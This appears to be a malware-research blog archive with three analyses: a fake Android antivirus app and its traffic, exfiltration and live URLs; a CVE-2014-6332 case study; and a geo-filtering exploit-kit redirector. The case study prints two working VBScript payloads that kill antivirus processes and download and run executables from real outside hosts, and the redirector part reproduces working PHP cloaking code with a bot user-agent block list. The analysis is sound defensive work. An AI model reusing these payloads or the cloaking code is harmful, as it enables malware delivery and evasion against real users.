<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> 02:02:34.141 2.050 734 1383 GET 200 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
02:02:36.216 0.056 749 (1965) GET (Cache) application/x-javascript http://www.cellphoneupdated.com/fatalvirus/us/106/backfix.min.js
02:03:39.010 0.020 805 (82) GET (Cache) text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html
02:03:39.772 0.060 897 (214) GET 304 text/html http://www.cellphoneupdated.com/fatalvirus/us/106/blank.html?HistoryLoad
02:03:43.045 2.351 947 222 GET 200 text/html http://track.cellphoneupdated.com/click
02:03:45.492 2.083 657 625 GET 200 text/html http://1nxoz.redirectvoluum.com/redirect?target=http%3A%2F%2Fhop.armorforandroid.net%2Fgo%2Faa.aff%3Faffid%3D10027%26v_campaign%3Dyd447a9ysnrwv44b2m8p97au545hqbpnqrqv%26subid%3DdQ31FAIBI19DCGGI0DIHGN46&ts=1425257252676&hash=zuiF0czwgopTMlbFFybUElFtRrEzh08G4HY3fKQ%2FH%2FQ%3D&rm=DJ
02:03:47.618 2.253 749 846 GET 302 Redirect to: http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://hop.armorforandroid.net/go/aa.aff?affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46
02:03:49.959 0.148 1028 215 GET 303 Redirect to: /k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812 http://www.fastermobile.org/v3e/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.154 0.113 1090 3072 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/index.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:50.293 0.145 864 1025 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/a.css
02:03:50.312 0.046 877 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:50.330 0.232 879 891 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/z.png
02:03:50.473 0.144 837 455 GET 200 application/x-javascript http://antivirus.trafficmanager.net/threatCount?range=7&callback=jsonp1&_=1425257258028
02:03:50.498 0.252 799 226 GET 200 application/javascript http://api.handsetdetection.com/sites/js/32266.js
02:03:50.525 0.285 877 167 GET 204 text/plain http://pixel.sitescout.com/iap/14b1248479c050b7
02:03:50.563 0.165 506 824 GET 200 image/png http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/p.png
02:03:50.583 0.370 539 35219 GET 200 application/x-font-ttf http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/font.ttf
02:03:54.517 0.178 1278 2382 GET 200 text/html http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/i.html?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:03:54.738 0.151 861 1085 GET 200 text/css http://www.fastermobile.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/aa.css
02:03:54.757 0.031 873 (0) GET (Cache) application/javascript http://cdnjs.cloudflare.com/ajax/libs/zepto/1.1.4/zepto.min.js
02:03:54.924 0.056 787 (1560) GET (Cache) application/x-javascript http://connect.facebook.net/en_US/fbds.js
02:03:54.950 0.240 873 167 GET 204 text/plain http://pixel.sitescout.com/iap/0770a2fc94ca2cbc
02:03:55.018 2.176 2106 334 POST 200 image/gif https://www.facebook.com/tr/
02:03:57.279 2.584 1205 3.2M GET 200 application/vnd.android.package-archive http://dlhub1.com/download/full?pop=1&version=release-search&strat=2&page=aa.matt.5svp.0830&split=c9c82b85.control&ccrule=fcc98f53&offer=aa.gi.default&product=anti-virus&partner=afacom&country=xx&language=en&pool=9d05eb72&affid=10027&v_campaign=yd447a9ysnrwv44b2m8p97au545hqbpnqrqv&subid=dQ31FAIBI19DCGGI0DIHGN46&shortcut=aa.aff&ipcc=us&iprc=ca&xsid=rfAdNVge1k6VR8ctHV7h2A&ccconfigid=a29869e5.140812
02:04:05.722 0.165 507 14521 GET 200 image/png http://www.fastermobile</code>.org/k/7s5jJPFpAdahNMbjZEbNCMUqOd4WD_sQ3Y9g7f0zBqYfUf7BRJw1jg2/fdu8903/x.png </pre>
<br />
The application looks like as shown below and it asks for user's credit or debit card information in order to conduct transaction so that fake anti-virus application can be installed after getting a license. Its all basically a fake process.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-wp_qp7qhefU/VPP9pUkoVJI/AAAAAAAAB0s/Xv4b6UEfQqI/s1600/and_st.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://4.bp.blogspot.com/-wp_qp7qhefU/VPP9pUkoVJI/AAAAAAAAB0s/Xv4b6UEfQqI/s1600/and_st.png" width="192" /></a></div>
<br />
<b>Assets Information:</b><br />
<br />
parameters.json {<br />
"bugsense_key": "f75779a2",<br />
"analytics_key": "01c0994d555ea19e1ef7e0e5b69c9dab",<br />
"security_key": "ca9u",<br />
"quick_scan": "true",<br />
"device_threats": "false"<br />
}<br />
<br />
version.json {<br />
"configuration": "1983",<br />
"pop": "1",<br />
"version": "release-search",<br />
"strat": "2",<br />
"page": "aa.matt.5svp.0830",<br />
"split": "c9c82b85.control",<br />
"ccrule": "fcc98f53",<br />
"offer": "aa.gi.default",<br />
"product": "anti-virus",<br />
"partner": "afacom",<br />
"country": "xx",<br />
"language": "en",<br />
"pool": "9d05eb72",<br />
"affid": "10027",<br />
"v_campaign": "yd447a9ysnrwv44b2m8p97au545hqbpnqrqv",<br />
"subid": "dAF08D9FUE813PVJ0PNAMH6O",<br />
"shortcut": "aa.aff",<br />
"ipcc": "us",<br />
"iprc": "ca",<br />
"xsid": "FyY0MUJgP0-AitmpO62mVw",<br />
"ccconfigid": "a29869e5.140812"<br />
}<br />
<br />
<b>Read/Write Operations are shown below:</b><br />
<br />
write<span class="Apple-tab-span" style="white-space: pre;"> </span>/data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|<br />
read<span class="Apple-tab-span" style="white-space: pre;"> </span> /data/data/com.android.music/shared_prefs/Music.xml|<br />
write<span class="Apple-tab-span" style="white-space: pre;"> </span>/data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|<br />
write<span class="Apple-tab-span" style="white-space: pre;"> </span>/data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml|<br />
read<span class="Apple-tab-span" style="white-space: pre;"> </span> /data/data/com.android.browser/shared_prefs/com.android.browser_preferences.xml|<br />
read<span class="Apple-tab-span" style="white-space: pre;"> </span> /data/data/com.android.mms/shared_prefs/_has_set_default_values.xml|<br />
read<span class="Apple-tab-span" style="white-space: pre;"> </span> /data/data/com.android.mms/shared_prefs/com.android.mms_preferences.xml|<br />
<br />
<b>Device ID submitted as follow:</b><br />
<br />
POST /api/submit?deviceId=d3rqs2c37m&version=349 HTTP/1.1<br />
Content-Type: application/json; charset=utf-8<br />
User-Agent: Dalvik/1.4.0 (Linux; U; Android 2.3.4; generic Build/GRJ22)<br />
Host: url.armorforandroid.net<br />
Connection: Keep-Alive<br />
Content-Length: 641<br />
Accept-Encoding: gzip<br />
<br />
<b>Data Exfiltration:</b><br />
<br />
POST /innilytics/upload/01c0994d555ea19e1ef7e0e5b69c9dab HTTP/1.1<br />
Content-Type: application/x-gzip<br />
Content-Length: 1558<br />
Host: innilytics.cloudapp.net<br />
Connection: Keep-Alive<br />
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)<br />
<br />
<span style="color: red;"><i>...........WYo.7.~....,<br />..\.~..&h.6<br />.&@Q..Oy.=.=....{g.R".).......c...o.O|........a\.,......M,.....<br />A...."pbyH.q.t*`...).J.R.r.........3.;...i./...<br />}W.M....?.........&.".eP*D.Tp..%<51...$]`.J.4OV)Zp....pL....i:p..m.+....}."/Y..=o......Q@.:G.@.KW@.V.n<<br />!J..6<*o.g...;].2.\.ESA.....'^R....:..k.#;...4k.c.,ep1#..2Zf".IE..+.7.:..z..t.1..e...3.5.......1...v.k......|..<br />Z..Y.y..2.2&..eID...Pz.z...L.0...R.......x........./..q.=...AK......l$.)C<-D..K....Z..p.x.1.....R....B.x..\.~..v...a..<x.{.g....v.k.k..o.>u....!....k..a"..m..&..(1.C.l..;....w5...j< yot.....r....5..,..l.n...f2G.C.v.@..r........F..&.B...#...H..<br />SWU.6c...C.-.g.!.=.9..O...<y.X3...S....O..?.......V[,.u..[s=......h..(;I!....../.1<br />....5..y.5..&D7m...c?...m'.p.......v=..#......y.isZ.}........iNVl...@.< }.l.\....j./j..K.....Yq.9.\..m.X.o.K7l.T......o.n.}...[w.f<d6.Z.s]o.*....(O..w..L...v.d......Y..~.gH...Q...3.....5...Tq@...9<br />..x.!..[h.x_.."7.j.f..h...K)...............8...0y\.-..]<br />..>h.{....?X...P?.9..]....d........N)(..2.o......_.O/.n.SrZ.....h^]...^......V.....q..........c..e...?x>..l6.ztS..L^.?..Uk.....F. ...95...9..-b...L<br />.d..l.uc....V....|ys...;.@...1..l...*ZOx.4.X...u......mf..N..5..<br />..].#).Y..G}..........vy......>C>..B..... .4.8..1!.B..(.."...........1.;..+..`....=Q..._A....G.....>E[....#._...P.?.......q.g.f.C.J ...Wq..UP....H...........fy4.........(:......-^....d......AJW.D{...(..........x....x....+.....(...jI........J"....F$..O..~j.z.|......[..Gv.E9z..........P.P l"$3D..z.m.t..d.}....~...._G$..oV..@..[.Z.....9..E...r..x..y~..Un....,.%3`N.R..J..\".%.... 0S."(q.ER......v.....</i>.</span><br />
<br />
HTTP/1.1 200 OK<br />
Cache-Control: private<br />
Server: Microsoft-IIS/7.5<br />
X-AspNetMvc-Version: 3.0<br />
X-AspNet-Version: 4.0.30319<br />
X-Powered-By: ASP.NET<br />
Date: Mon, 04 May 2015 01:36:51 GMT<br />
Content-Length: 0<br />
<br />
Virus Total - <b><a href="https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/" target="_blank">https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/</a></b><br />
<br />
At the time of this post, the link is still active :<b> <span style="color: red;">hxxp://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U</span></b><br />
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;">Beware of these kinds of applications !</span></b><br />
<b><br /></b>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-57051593101458772062015-03-14T22:06:00.001-07:002015-03-14T22:06:07.457-07:00A Real World Story of CVE-2014-6332 : RCE and Malware Download via VBScript !<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Af4DiWLbLHE/VPP5HsuD6TI/AAAAAAAABz4/oOHODQNTniQ/s1600/security_exploits.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Af4DiWLbLHE/VPP5HsuD6TI/AAAAAAAABz4/oOHODQNTniQ/s1600/security_exploits.jpg" height="133" width="200" /></a></div>
Recently, we have observed in our analysis that the exploit code for vulnerability with identifier CVE-2014-6332 is either directly embedded in the webpages of the infected website or used as a part of <a href="http://secniche.org/presentations/virus_bulletin_barcelona_2011_adityaks.pdf" target="_blank">Browser Exploits Packs</a> (BEPs) for downloading malware and executing commands remotely.<br />
<br />
<span style="white-space: pre;">Earlier, we have discussed about how Chinese domains served almost the similar exploits taken from MetaSploit (</span><a href="http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html" style="white-space: pre;" target="_blank"><b>http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html</b></a><span style="white-space: pre;">)</span><span style="white-space: pre;"> to trigger infections. However, the attackers tweak the structure of exploits as per the requirements in order to conduct successful infections on the fly through compromised websites.</span><br />
<br />
Let's discuss the vulnerability in question. From Internet: <i>"CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."<span class="Apple-tab-span" style="white-space: pre;"> </span></i><br />
<i><span class="Apple-tab-span" style="white-space: pre;"><br /></span></i>
<span class="Apple-tab-span" style="white-space: pre;">Refer: Metasploit Module (<a href="http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb" target="_blank"><b>http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb</b></a>) and Microsoft advisory on the subject (<a href="https://technet.microsoft.com/en-us/library/security/ms14-064.aspx" target="_blank"><b>https://technet.microsoft.com/en-us/library/security/ms14-064.aspx</b></a>)</span><br />
<br />
Trend Micro has some discussed about this vulnerability (<a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/" target="_blank"><b>http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332</b>/</a>) so we do now want to discuss that in detail.<br />
<br />
Two variants of VBScript have been found that are used in conjunction with this vulnerability which are discussed below. The primary structure of the exploit remains the same but payload is solely based on the VBScript code embedded in the webpages or BEPs.<br />
<br />
As you can see, "cmd.exe" is triggered with options "/q, /c" which forces the Windows to execute command without echoing the output which means commands are executed without any notifications in the Windows GUI. Other insights:<br />
<br />
The Norton "360.exe" process is killed and several other commands are executed.<br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\360.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\361.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\¡¸¿ªÊ¼¡¹²Ëµ¥\³ÌÐò\Æô¶¯\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
end function
</script>
</code></pre>
<br />
Another variant of exploit payload is shown below which highlights that how exactly HTTP requests are issued using AJAX and MSXML2 for downloading malware (<b>http://natmasla.ru/ath/sploit/natmasla.exe, this link might be active</b>) directly. VBScript calls are then used to execute the malware.<br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: 100%; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&
@echo
Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&
@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&
@echo
objXMLHTTP.send()>>wUnlRLZR.vbs&
@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&
@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&
@echo objADOStream.Open>>wUnlRLZR.vbs&
@echo objADOStream.Type=1 >>wUnlRLZR.vbs&
@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&
@echo objADOStream.Position=0 >>wUnlRLZR.vbs&
@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&
@echo objADOStream.Close>>wUnlRLZR.vbs&
@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&
@echo End if>>wUnlRLZR.vbs&
@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&
@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&
@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0
end function
</script>
</code></pre>
<br />
Public available exploits can be tweaked easily as discussed in the case study above. It is really interesting to analyze the types of payloads and exploits used in the wild for exploiting vulnerabilities in the browsers.<br />
<br />
<b>Inference:</b> Openly available exploits are restructured by the attackers and used in BEPs to trigger infections.<br />
<br />Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-48121715107678734182015-02-22T19:43:00.001-08:002015-03-01T22:06:40.273-08:00A Case Study of Geo-location Filtering and Dedicated Malware Infections !<div class="separator" style="clear: both; text-align: center;">
<a href="http://blog.thesecurityawarenesscompany.com/wp-content/uploads/2013/08/android-geolocation-143.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://blog.thesecurityawarenesscompany.com/wp-content/uploads/2013/08/android-geolocation-143.jpg" height="100" width="200" /></a></div>
<div>
It is a wide-known fact that the majority of infectious code (iframe redirecting to browser exploit packs) is hosted on free domains or compromised websites that are sold in the underground community. In my earlier presentation at Virus Bulletin Conference (<a href="http://secniche.org/presentations/virus_bulletin_barcelona_2011_adityaks.pdf" target="_blank"><b>HERE</b></a>), I discussed about the IP Address Logging Detection Trick (IPLDT) which basically allows the attackers to restrict the spreading of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:</div>
<div>
<br />
<ul>
<li><b>Styx Exploit Pack - <a href="http://secniche.org/released/VB_Styx_Exploit_Pack.pdf" target="_blank">http://secniche.org/released/VB_Styx_Exploit_Pack.pdf</a></b></li>
<li><b>Sweet Orange Exploit Pack - <a href="http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf" target="_blank">http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf</a></b></li>
</ul>
<br />
A simple work flow is discussed below:</div>
<div>
<ul>
<li>User visits the website serving infectious code.</li>
<li>Infected website triggers the custom code hosted by attacker to check for the following:</li>
<ul>
<li>Geo-location of the IP address: If Geo-location of the IP address of the end-user is found to be mapped to specific locations in the configuration file, the user's browser is redirected to BEP for exploitation.</li>
<li>Verifying whether the exploit-code has been served to this IP or not: If the database shows that IP has been served already, IP address of the end-user is filtered and BEP URL is not served. </li>
</ul>
<li>When the user browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.</li>
</ul>
</div>
<div>
<div>
In addition, filters are also added for various automated spiders to restrict the access to bots (spiders) to prevent the appearance of malicious website or links in the search results. Recently, I was analyzing a malicious website that was serving infectious code and redirects the user's browser to BEP to download malware by exploiting specific vulnerability. However, the name of the exploit kit is not known. This analysis is more concentrated on the compromised website that performs redirection of the user's browser to the BEP.<br />
<br />
A code snippet extracted from the infected webite is presented below. It clearly shows that the user-agent and IP Geo-location("CH" = Switzerland, "DE" = Germany) components are used for setting filters on the incoming HTTP traffic. Additionally, two files are generated for building databases for the IP addresses that are either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link of the BEP URL from the infected website.</div>
</div>
<div>
<br /></div>
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <?php
error_reporting(0); ini_set('display_errors',0);
function is_bot($myuagent, $myip) {
$uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);
$ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
foreach ($uagents as $exp) {
if (preg_match('/'.$exp.'/i',$myuagent)) {
return true;
}
}
foreach ($ips as $exp) {
if (preg_match('/'.$exp.'/',$myip)) {
return true;
}
}
return false;
}
<b>$countries = "CH;DE"; </b>
// no?aie?ea n nieiaoii
$good_link = "./banner.php";
// eaaay no?aie?ea
$bad_link = "./blabla.php";
//
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
<b> $file = fopen("./sbase.txt","a+");
$file2 = fopen("./sbase_bad.txt","a+"); </b>
$already_showed = FALSE;
while (!feof($file)) {
$buffer = fgets($file);
$ip2 = $ip."\r\n";
if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
}
if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;
if($already_showed) {
include($bad_link);
} else {
require_once('./geoip/geoip.inc');
$gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
$ccode = explode(";",$countries);
$show = FALSE;
foreach($ccode as $value) {
if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
$show = TRUE;
fwrite($file,$ip."\r\n");
}
}
geoip_close($gi);
if($show) {
include($good_link);
} else {
fwrite($file2,$ip."|".$ua."\r\n");
include($bad_link);
}
}
fclose($file);
?> </code></pre>
<br />
On checking the stats of the two files, following stats were gathered:<br />
<ul>
<li><b>Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.</b></li>
<li><b>Approximately 15737 unique IP addresses <b>(users' browsers) </b> were restricted from visiting to the BEP.</b></li>
</ul>
<div>
The list of banned user-agents are shown below:</div>
<div>
<br /></div>
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> Ask\s*Jeeves
HP\s*Web\s*PrintSmart
HTTrack
IDBot
Indy\s*Library#
ListChecker
MSIECrawler
NetCache
Nutch
RPT-HTTPClient
rulinki\.ru
Twiceler
WebAlta
Webster\s*Pro
www\.cys\.ru
Wysigot
Yahoo!\s*Slurp
Yeti
Accoona
CazoodleBot
CFNetwork
ConveraCrawlerDISCo
Download\s*Master
FAST\s*MetaWeb\s*Crawler
Flexum\s*spider
Gigabot
HTMLParser
ia_archiver
ichiro
IRLbot
Java
km\.ru\s*bot
kmSearchBot
libwww-perl
Lupa\.ru
LWP::Simple
lwp-trivial
Missigua
MJ12bot
msnbot
msnbot-media
Offline\s*Explorer
OmniExplorer_Bot
PEAR
psbot
Python
rulinki\.ru
SMILE
Speedy
Teleport\s*Pro
TurtleScanner
User-Agent
voyager
Webalta
WebCopier
WebData
WebZIP
Wget
